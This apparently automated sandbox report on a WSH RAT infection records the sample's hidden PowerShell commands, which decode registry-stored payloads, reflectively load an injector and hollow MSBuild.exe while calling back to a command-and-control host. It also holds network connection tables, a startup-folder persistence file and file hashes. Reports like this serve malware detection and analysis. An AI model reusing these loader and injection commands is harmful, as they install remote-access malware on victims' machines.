"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path ben738sj11xz.mywire.org 5478 "WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands" 1
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.18:443 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ben738sj11xz.mywire.org | udp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| DE | 23.51.123.27:80 | tcp | |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
| US | 107.172.73.191:5478 | ben738sj11xz.mywire.org | tcp |
Files
memory/3436-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\launcher service.js
| MD5 | 8dce2fac1cdb56ef997f0c4f8065f82e |
| SHA1 | da01f70d7035a8e8421d2296c7b481dc6dcb2b09 |
| SHA256 | 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411 |
| SHA512 | cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js
| MD5 | 28d4b39c5ab839e66afd24b3789e28c7 |
| SHA1 | 1e13f0ff2bcfcbf04b6ed9e6225d5772a3b5bb13 |
| SHA256 | c3a8a50de9d7aa5142a35612187d9f315134420f36310b18a4da7dbf4826a0aa |
| SHA512 | 27b95b87cbe1d8b602df02a95e3ed3e7737a5adfc94d903ea95ecce501a569ef582bc370911b35c1c48ab90a93ad3fea340bf017f2e032607230b52c188be51b |
memory/4304-118-0x0000000000000000-mapping.dmp
memory/4304-119-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-120-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-121-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-122-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-123-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-124-0x00000120B33D0000-0x00000120B33D1000-memory.dmp
memory/4304-125-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-127-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-129-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-128-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-130-0x00000120B3780000-0x00000120B3781000-memory.dmp
memory/4304-131-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-137-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-138-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-142-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/4304-143-0x0000012097500000-0x0000012097502000-memory.dmp
memory/4304-144-0x0000012097503000-0x0000012097505000-memory.dmp
memory/4304-145-0x00000120974F0000-0x00000120974F2000-memory.dmp
memory/3264-146-0x0000000000000000-mapping.dmp
memory/4304-147-0x0000012097506000-0x0000012097508000-memory.dmp
memory/3264-149-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8a313b70fd641fc4e6fffb40391d0b4d |
| SHA1 | 22684fe19ecd7943ac18e622db0d7f161db500e8 |
| SHA256 | bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911 |
| SHA512 | 5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246 |
memory/3264-150-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-151-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-152-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-153-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-155-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dbbeee3c97557a70459b6d579e0d23bf |
| SHA1 | 00e30dbe674d7c561da954a7059a719f864fcdde |
| SHA256 | 503b948d4073ee324fb320d16c13e589b8aee0f6c254c5c9e4c52b3d4b4d48e7 |
| SHA512 | dde59ef8c9b4e948ceab50389a8d4d4677596038c217f80270c8e8ace209e80bbe35984c9168c0040f67a78bb58c6c9ca5ebc5d242e4c1027c83bbfeffecbc09 |
memory/3264-158-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-159-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-160-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-162-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-172-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/3264-173-0x000002CD211D0000-0x000002CD211D2000-memory.dmp
memory/864-174-0x0000000000000000-mapping.dmp
memory/3264-176-0x000002CD22C43000-0x000002CD22C45000-memory.dmp
memory/3264-177-0x000002CD22C46000-0x000002CD22C48000-memory.dmp
memory/3264-175-0x000002CD22C40000-0x000002CD22C42000-memory.dmp
memory/864-178-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-179-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-180-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-182-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-181-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-184-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 98cd985d8372e4230d6f0ff9af003fd0 |
| SHA1 | d6b538603d60624cfd00404d141eab9e50025c7f |
| SHA256 | e05e0f99f07a63bd7943f876777e10e4600536aecbfc184d51c33e69a1900a32 |
| SHA512 | 56d2e322cdfdb7eae5244999faf30a4c16b95e7461cef5d0b8b2518ff06db7b6ed01c7a822b99a566126ee6265ce0c698d5d276302fcf0bd74ed8ccbab25c01e |
memory/864-187-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-189-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-188-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/864-191-0x0000024CB9A70000-0x0000024CB9A72000-memory.dmp
memory/2160-199-0x00000000004071AE-mapping.dmp
memory/864-202-0x0000024CB9C23000-0x0000024CB9C25000-memory.dmp
memory/864-201-0x0000024CB9C20000-0x0000024CB9C22000-memory.dmp
memory/864-203-0x0000024CB9C26000-0x0000024CB9C28000-memory.dmp
memory/2160-209-0x00000000051E0000-0x00000000051E1000-memory.dmp